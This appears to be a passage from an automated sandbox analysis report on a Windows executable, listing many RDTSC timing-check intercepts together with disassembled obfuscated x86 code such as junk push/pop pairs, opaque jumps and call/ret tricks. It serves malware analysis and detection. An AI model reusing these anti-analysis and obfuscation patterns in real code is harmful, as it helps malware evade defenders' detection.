Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4D6D2 second address: B4D6FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 jng 00007FD934BC97FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FD934BC97E8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4D6FA second address: B4D6FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B50D8B second address: B50D90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B515C4 second address: B515CE instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD934C4561Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B52EC6 second address: B52F3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FD934BC97E1h 0x0000000e popad 0x0000000f push eax 0x00000010 jp 00007FD934BC97EEh 0x00000016 nop 0x00000017 xor edi, 4BAF29D1h 0x0000001d mov dword ptr [ebp+12463C3Bh], ebx 0x00000023 push 00000000h 0x00000025 mov edi, dword ptr [ebp+122D291Ah] 0x0000002b push 00000000h 0x0000002d mov dword ptr [ebp+122D17F2h], ebx 0x00000033 pushad 0x00000034 xor dword ptr [ebp+12457359h], edx 0x0000003a mov dword ptr [ebp+122D1A57h], ecx 0x00000040 popad 0x00000041 xchg eax, ebx 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 je 00007FD934BC97D6h 0x0000004b push ebx 0x0000004c pop ebx 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B539AD second address: B539B7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD934C45616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B539B7 second address: B539BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B539BE second address: B539CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jbe 00007FD934C4561Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B5638C second address: B56392 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B585C7 second address: B585D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B58B2B second address: B58B2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B5999C second address: B599A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B599A0 second address: B59A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ebx, dword ptr [ebp+122D2906h] 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FD934BC97D8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebp 0x00000031 call 00007FD934BC97D8h 0x00000036 pop ebp 0x00000037 mov dword ptr [esp+04h], ebp 0x0000003b add dword ptr [esp+04h], 0000001Bh 0x00000043 inc ebp 0x00000044 push ebp 0x00000045 ret 0x00000046 pop ebp 0x00000047 ret 0x00000048 call 00007FD934BC97E4h 0x0000004d call 00007FD934BC97DBh 0x00000052 xor ebx, 7CCD2F64h 0x00000058 pop ebx 0x00000059 pop ebx 0x0000005a mov edi, dword ptr [ebp+122D2E4Bh] 0x00000060 xchg eax, esi 0x00000061 jne 00007FD934BC97DEh 0x00000067 push eax 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007FD934BC97E2h 0x0000006f rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B59BD6 second address: B59BE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FD934C45616h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B5ACB7 second address: B5ACBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B5B974 second address: B5B986 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD934C4561Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B5C93A second address: B5C93E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B5C93E second address: B5C944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B5BBF3 second address: B5BBF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B5C944 second address: B5C96D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FD934C45628h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f jp 00007FD934C45616h 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B5D921 second address: B5D927 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B5CB20 second address: B5CB2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FD934C45616h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B5CB2B second address: B5CB39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B5CB39 second address: B5CB3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B5CB3F second address: B5CB44 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B5CB44 second address: B5CBD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 pushad 0x00000009 mov cl, C5h 0x0000000b or ebx, dword ptr [ebp+122D29C6h] 0x00000011 popad 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov ebx, dword ptr [ebp+122D2A1Eh] 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 mov bx, si 0x00000029 call 00007FD934C45624h 0x0000002e mov ebx, eax 0x00000030 pop edi 0x00000031 mov eax, dword ptr [ebp+122D0869h] 0x00000037 jp 00007FD934C4561Ch 0x0000003d mov ebx, dword ptr [ebp+122D2E14h] 0x00000043 push FFFFFFFFh 0x00000045 push 00000000h 0x00000047 push esi 0x00000048 call 00007FD934C45618h 0x0000004d pop esi 0x0000004e mov dword ptr [esp+04h], esi 0x00000052 add dword ptr [esp+04h], 0000001Ah 0x0000005a inc esi 0x0000005b push esi 0x0000005c ret 0x0000005d pop esi 0x0000005e ret 0x0000005f jbe 00007FD934C4561Bh 0x00000065 mov edi, 74904FE4h 0x0000006a mov edi, dword ptr [ebp+122D2986h] 0x00000070 nop 0x00000071 push eax 0x00000072 push edx 0x00000073 ja 00007FD934C45618h 0x00000079 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B5CBD6 second address: B5CBFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jng 00007FD934BC97FCh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD934BC97E6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B629E0 second address: B629E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B629E4 second address: B629E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B61AF8 second address: B61B05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B639F2 second address: B639F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B639F6 second address: B639FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B639FB second address: B63A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B62B22 second address: B62B31 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD934C45616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B63A01 second address: B63A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, dword ptr [ebp+122D1B74h] 0x00000010 push 00000000h 0x00000012 sub edi, dword ptr [ebp+122D2916h] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007FD934BC97D8h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 00000019h 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 je 00007FD934BC97D9h 0x0000003a movzx edi, bx 0x0000003d mov di, 4243h 0x00000041 push eax 0x00000042 push eax 0x00000043 push esi 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B64A8C second address: B64A92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B64A92 second address: B64A96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B64A96 second address: B64A9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B63CB1 second address: B63CB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B669E3 second address: B669EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jne 00007FD934C45616h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B669EF second address: B669F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B65CB9 second address: B65CC3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD934C45616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B65CC3 second address: B65D58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnl 00007FD934BC97D6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FD934BC97E3h 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007FD934BC97D8h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d mov edi, dword ptr [ebp+1244FD8Ch] 0x00000033 xor dword ptr [ebp+122D19CCh], esi 0x00000039 push dword ptr fs:[00000000h] 0x00000040 push 00000000h 0x00000042 push edx 0x00000043 call 00007FD934BC97D8h 0x00000048 pop edx 0x00000049 mov dword ptr [esp+04h], edx 0x0000004d add dword ptr [esp+04h], 0000001Bh 0x00000055 inc edx 0x00000056 push edx 0x00000057 ret 0x00000058 pop edx 0x00000059 ret 0x0000005a mov dword ptr fs:[00000000h], esp 0x00000061 mov eax, dword ptr [ebp+122D1079h] 0x00000067 push FFFFFFFFh 0x00000069 adc bl, 00000040h 0x0000006c push eax 0x0000006d jo 00007FD934BC97E0h 0x00000073 push eax 0x00000074 push edx 0x00000075 push edi 0x00000076 pop edi 0x00000077 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B66B02 second address: B66B09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B66B09 second address: B66B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FD934BC97D8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B66B1B second address: B66BA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b adc bx, 3894h 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007FD934C45618h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 mov bx, dx 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b jmp 00007FD934C45627h 0x00000040 mov eax, dword ptr [ebp+122D105Dh] 0x00000046 sbb bx, 436Bh 0x0000004b push FFFFFFFFh 0x0000004d mov dword ptr [ebp+1247A4F5h], eax 0x00000053 nop 0x00000054 jmp 00007FD934C45621h 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jl 00007FD934C45618h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B70DD8 second address: B70DE2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD934BC97D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B710B7 second address: B710BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B72F0C second address: B72F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD934BC97D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B72F16 second address: B72F1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B72F1A second address: B72F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FD934BC97D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B72F26 second address: B72F3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934C45625h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B72F3F second address: B72F49 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD934BC97D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B72F49 second address: B72F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B7BAF5 second address: B7BAF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B7C1CE second address: B7C1ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FD934C45629h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B7C1ED second address: B7C1F9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B7C1F9 second address: B7C1FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B7C33F second address: B7C398 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD934BC97D6h 0x00000008 jmp 00007FD934BC97E5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jp 00007FD934BC97DAh 0x00000015 pop ebx 0x00000016 push esi 0x00000017 jp 00007FD934BC97E2h 0x0000001d push eax 0x0000001e push edx 0x0000001f push esi 0x00000020 pop esi 0x00000021 jmp 00007FD934BC97E8h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B7C627 second address: B7C64D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FD934C45616h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD934C45629h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B7C64D second address: B7C663 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B7C663 second address: B7C675 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007FD934C45616h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FD934C45616h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B7C811 second address: B7C815 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B81AF0 second address: B81B0E instructions: 0x00000000 rdtsc 0x00000002 js 00007FD934C45616h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD934C4561Eh 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B81B0E second address: B81B12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B81B12 second address: B81B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B85E8A second address: B85EB0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FD934BC97E4h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FD934BC97E8h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B85EB0 second address: B85EB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B0ECCE second address: B0ECD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B84BD7 second address: B84BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B84BDD second address: B84BE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B84BE1 second address: B84BEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FD934C45618h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B4E7D0 second address: B4E7D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B4E7D4 second address: B4E7DE instructions: 0x00000000 rdtsc 0x00000002 js 00007FD934C45616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B4E7DE second address: B4E7E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FD934BC97D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B4E7E8 second address: B4E82A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 call 00007FD934C4561Ah 0x0000000e mov ecx, dword ptr [ebp+122D2932h] 0x00000014 pop edi 0x00000015 lea eax, dword ptr [ebp+12482551h] 0x0000001b jmp 00007FD934C45629h 0x00000020 nop 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushad 0x00000025 popad 0x00000026 push ebx 0x00000027 pop ebx 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B4E82A second address: B4E830 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B4E830 second address: B4E834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B4E834 second address: B34C91 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jnl 00007FD934BC97DCh 0x00000010 jl 00007FD934BC97DCh 0x00000016 jno 00007FD934BC97D6h 0x0000001c popad 0x0000001d nop 0x0000001e sub dword ptr [ebp+122D2E31h], eax 0x00000024 add edi, 46B0BA7Fh 0x0000002a call dword ptr [ebp+124545C2h] 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 jc 00007FD934BC97D6h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B4E907 second address: B4E90D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: B4E90D second address: B4E911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
